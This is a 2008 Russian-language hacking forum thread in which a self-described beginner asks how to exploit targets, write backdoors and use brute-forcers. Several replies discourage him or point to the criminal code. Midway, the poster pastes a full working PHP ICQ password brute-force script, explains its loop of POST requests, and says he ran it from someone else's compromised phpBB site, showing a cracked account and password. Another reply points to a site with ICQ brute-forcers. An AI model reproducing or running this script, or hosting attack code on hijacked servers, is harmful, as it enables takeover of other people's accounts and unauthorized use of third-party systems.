Сообщений в теме: 45

[® -=_Р-у-©-©-к-и-й_=- ®]

Кто из участников готов откликнутся и помочь "чайнику" стать - "заварником"?!


Интересует следующее:

Что делать с информацией о потонциальной жертве (как её юзать с выгодой) ... ip, порты, уязвимости.
Какой программой (актуальной) можно выявлять - уязвимости на серверах и частных машинах.
Как писать (на чём писать) - блекдоры?
Актуальны ли сейчас - брутфорсы и какие стоит юзать?
Как настроить AccessDiver и как его с умом юзать?

Можно ли найти людей в Алматы - в реале, классно разбирающихся в вопросах получения доступа (за деньги) для прохаждения у них курса "молодого бойца"?

Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?

Буду признателен за любую информацию, ... т.к. "загорелось" освоить данную стезю.
Накачал кучу софта, кучу статей... но собрать всё во едино пока не получается...

[eroha]

вот сам и читай

блекдоры

[Black Dragon]

УК лучше почитать

[® -=_Р-у-©-©-к-и-й_=- ®]

Ну пацаны вы даёте, ХОЧУ ЗНАТЬ ЧИСТО ДЛЯ СЕБЯ, не какого взлома и впомине не будет.

А будет установлен сервак скорее всего на Апачи .... и нужно знать от куда ждать гостей.

Может кто помочь?

[GedeonSilfeus]

По этому поводу полно ресурсов в сети... Полно книг... как по защите, так и атакам...

[® -=_Р-у-©-©-к-и-й_=- ®]

По этому поводу полно ресурсов в сети... Полно книг... как по защите, так и атакам...

Скажу больше,.... почти нечего нет.(не актуальный хлам) Из класных взломщиков в московских форумах только Кузя (автор одной доступной и хорошей книги) http://forum.inattac...topic=6313&st=0

Но он с "чайниками" не общается.... а толковых людей по мимо его, мною не наблюдалось.

Просил москвичей помочь с брутфосом но дальше "стандартной" заготовки они не чего не умеют.

Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 16.04.2008, 17:34:21

[GedeonSilfeus]

Ну и зачем Вам? Если Вам не попадались книги по безопасности сетей стоящие, то это совсем не означает, что их нет.

[® -=_Р-у-©-©-к-и-й_=- ®]

Ну и зачем Вам? Если Вам не попадались книги по безопасности сетей стоящие, то это совсем не означает, что их нет.

Соглашусь, но вот где их взять и как взять именно "их" ?

Зачем мне...?

Очень хочется, научится понимать то что другим не доступно.... типо хоби что ли.

Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 16.04.2008, 17:51:01

[Andrew_S]

Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?
Очень хочется, научится понимать то что другим не доступно.... типо хоби что ли.

И как вы это хотите совместить?

[® -=_Р-у-©-©-к-и-й_=- ®]

Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?
Очень хочется, научится понимать то что другим не доступно.... типо хоби что ли.

И как вы это хотите совместить?

В смысле?

Вобщето хотелось бы освоить "готовые" програмули а потом начать разбирать PHP CE Perl and Assembler.

Ну что бы посмотреть, что это такое а потом начать разбираться как это работает и писать свои скрипты.

к примеру...

Вот это скррипт брутофорса...


<?
/*//////////////////////////////////////
// ICQ Брутофорс by Zadoxlik //
// Идея The FUF //
*///////////////////////////////////////
?>
<h4>ICQ брутофорс</h4>
<form method=post action="">
Аськи с <input type=text name=diap1> по <input type=text name=diap2>
<BR>тестим на пасс <input type=text name=pass>
<input type=submit value="давай">
</form>

<?
if(@$diap1 && @$diap2 && @$pass){
//Собственно процесс брутофорса

for($i=$diap1; $i<=$diap2; $i++){
$open_host="www.icqmail.com";
$open_port="80";
$main_url2="http://www.icqmail.c...g_icq.asp&#34;;
$refer2="http://www.icqmail.c...g_icq.asp&#34;;
$host="www.icqmail.com";
$sock = fsockopen($open_host, $open_port, $errno, $errstr, 100);
fputs($sock, "POST ".$main_url2." HTTP/1.0\r\n");
fputs($sock, "Host: ".$host."\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "Accept-Language: ru\r\n");
fputs($sock, "Proxy-Connection: Keep-Alive\r\n");
fputs($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n");
fputs($sock, "Referer: ".$refer2."\r\n");
fputs($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-Length: 116\r\n");
fputs($sock, "Pragma: no-cache\r\n");
fputs($sock, "Cookie: lang=xx; temp=; domaincode=icq\r\n");
fputs($sock, "\r\n");
fputs($sock, "AltID=".$i."&user=gfsdghfshh&pwd=".$pass."&repwd=".$pass."&firstname=&lastname=&tosagree=on&action=register&xo=\r\n");
fputs($sock, "US\r\n");
fputs($sock, "\r\n");
$u=fread($sock, 100);
for($x=0;$x < 900;$x++){
$headers = fgets ($sock, 4096);
@$a=$a.$headers;}
fclose($sock);
@$good=eregi("(We're sorry, your ICQ)", $a);
$a="0";
if(!@$good){
$fp=fopen("good.txt","a");
$messaga=$i." - pass: ".$pass."\r\n";
fputs($fp,$messaga);
fclose($fp);}
}
}





?>


Суть скрипта в том, что через цикл открывается сокет, отсылающий на сервер POST запрос.. Таким образом можно пробивать несколько асек на один пароль, либо одну аську на пароль скажем из какой-то библииотеки. Этот скрипт предназначен для пробивания ряда асек на один пароль...
Попробуем его в деле....

303615701

Это пробная ася. Пароль на нее
123321_

Попробуем пробрутить его..
=))) Я предварительно залил скрипт на один сайтик. Он не мой =)) На нем стоял злополучный PHPBB 2.0.10 )))
Посканим такой небольшой диапозон..

Если пароль от аськи подходит, данные об этом записываются в файл good.txt

Смотрим....
303615701 - pass: 123321_

Вот так вот =)))
Вообще в качестве примера выбран скрипт, написанный на PHP, хотя для брутофорса это конечно не лучший вариант.
PHP выбран для простоты понимания алгоритма, переписать его на другие языки не составит особого труда.
Вот и все, удачи !

Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 16.04.2008, 19:11:55

[Andrew_S]

В смысле?

Вобщето хотелось бы освоить "готовые" програмули а потом начать разбирать PHP CE Perl and Assembler.

Ну что бы посмотреть, что это такое а потом начать разбираться как это работает и писать свои скрипты.

Может сначала языки программирования освоить, а потом все остальное

Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?

[otaku]

если цель сайт. портал...
смотри на чем крутиться, потом начинай шерстить инет на предмет дыр и тп уязв. Или если понимаешь, то на чем куртиться, сам вникай.

На АД есть много разных мануалов в инете.

и еще , как отметили сверху, "бэкдор", не блэк

гугли

[eroha]

Может сначала языки программирования освоить, а потом все остальное

аналогично
думаю освоить для начала программирование
причем начинать не с дырявого PHP

[Максус Фраус]

причем начинать не с дырявого PHP

откуда такое решение?

[Wolframe]

если интересен брут асек,то иди на asechka.ru Там бруты асек есть,авторегеры есть,+свое ты не напишешь,не зная протокола icq. там уже все расписано,почитай.

[intelfan]

откуда такое решение?

Нет совершенного ПО, так что любой программный продукт можно назвать дырявым.

думаю освоить для начала программирование

согласен, стоит начинать именно с этого.

[Z@voolon]

Людям нужна такая программа. В которой есть поле ввода IP или лонина и большая красная кнопка взломать. Ломать - не есть гуд. Лучше пустите знания в мирные цели. Разработка или тестирование програм. В open-source таким людям всегда рады. Может даже заработать получится. А на взломе можно только срок заработать.

[eroha]

В open-source таким людям всегда рады

да это полезное занятие
но опять же требует подготовки

[® -=_Р-у-©-©-к-и-й_=- ®]

если цель сайт. портал...
смотри на чем крутиться, потом начинай шерстить инет на предмет дыр и тп уязв. Или если понимаешь, то на чем куртиться, сам вникай.

На АД есть много разных мануалов в инете.

и еще , как отметили сверху, "бэкдор", не блэк

гугли

Есть возможность подсказать: порядок освоения програм и языков програмирования?

Если цель сайт? А именно интерессны актуальные ресурсы, соглашусь гугл рулит.... но получить "нужную" инфу не всегда возможно, т.к. не всегда понятно что именно нужно для конкретной ситуации.

По этому с начало хотелось бы освоить ПО ( с вводом ай - пи и кнопкой взлом... само сабой буду ломать СЕБЯ.,... не нужны мне "мидали и ордена" хочу научится разбиратся в этом САМ и для СЕБЯ).

Кто нибудь может помочь?

Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 17.04.2008, 10:09:45

[Andrew_S]

2 -=_Р-у-©-©-к-и-й_=- ®
Вы вот IP сканили, а свой попробуйте, что там покажет?